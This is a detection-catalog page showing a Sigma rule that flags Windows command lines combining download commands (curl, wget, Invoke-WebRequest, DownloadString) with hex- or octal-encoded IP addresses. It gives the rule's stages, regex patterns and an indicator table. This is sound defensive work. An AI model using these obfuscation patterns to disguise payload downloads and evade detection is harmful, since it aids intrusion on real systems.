detection.wiki

Detection rules › Sigma

Obfuscated IP Download Activity

Severity
medium
Author
Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
Source
upstream

Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command

Event coverage

ProviderEvent IDTitle
Sysmon1Process creation
Security-Auditing4688A new process has been created.

Stages and Predicates

Stage 1: selection_command

or:
CommandLine|contains: DownloadFile
CommandLine|contains: DownloadString
CommandLine|contains: Invoke-RestMethod
CommandLine|contains: Invoke-WebRequest
CommandLine|contains: 'curl '
CommandLine|contains: 'irm '
CommandLine|contains: 'iwr '
CommandLine|contains: 'wget '

Stage 2: 1 of selection_ip_1

or:
CommandLine|contains: ' 0x'
CommandLine|contains: .00x
CommandLine|contains: .0x
CommandLine|contains: '//0x'

Stage 3: 1 of selection_ip_2

CommandLine|contains: '%2e'
CommandLine|contains: 'http://%'

Stage 4: 1 of selection_ip_3

or:
CommandLine|re: ' [0-7]{7,13}'
CommandLine|re: 'https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11}'
CommandLine|re: 'https?://0[0-9]{1,11}'
CommandLine|re: 'https?://0[0-9]{3,11}'
CommandLine|re: 'https?://[0-9]{1,3}\.0[0-9]{3,7}'
CommandLine|re: 'https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4}'

Stage 5: not 1 of filter_main_valid_ip

CommandLine|re: 'https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4}'

Indicators

Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.

FieldKindValues
CommandLinematch
  • 0x corpus 2 (sigma 2)
  • %2e corpus 2 (sigma 2)
  • .00x corpus 2 (sigma 2)
  • .0x corpus 2 (sigma 2)
  • //0x corpus 2 (sigma 2)
  • DownloadFile corpus 2 (sigma 2)
  • DownloadString corpus 5 (sigma 5)
  • Invoke-RestMethod corpus 4 (sigma 4)
  • Invoke-WebRequest corpus 6 (sigma 6)
  • curl corpus 8 (sigma 8)
  • http://% corpus 2 (sigma 2)
  • irm corpus 3 (sigma 3)
  • iwr corpus 8 (sigma 8)
  • wget corpus 7 (sigma 7)
CommandLineregex_match
  • [0-7]{7,13} corpus 2 (sigma 2)
  • https?://((25[0-5]|(2[0-4]|1\d|[1-9])?\d)(\.|\b)){4} corpus 2 (sigma 2)
  • https?://(0[0-9]{1,11}\.){3}0[0-9]{1,11} corpus 2 (sigma 2)
  • https?://0[0-9]{1,11} corpus 2 (sigma 2)
  • https?://0[0-9]{3,11} corpus 2 (sigma 2)
  • https?://[0-9]{1,3}\.0[0-9]{3,7} corpus 2 (sigma 2)
  • https?://[0-9]{1,3}\.[0-9]{1,3}\.0[0-9]{3,4} corpus 2 (sigma 2)